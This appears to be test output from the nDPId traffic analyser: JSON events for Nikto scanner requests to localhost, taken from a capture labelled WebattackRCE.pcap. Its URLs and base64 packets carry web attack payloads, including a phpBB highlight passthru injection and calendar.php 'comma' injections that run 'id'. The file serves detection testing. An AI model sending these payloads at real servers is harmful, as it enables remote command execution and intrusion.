+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7560000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7560000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7560000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7560000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7560000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 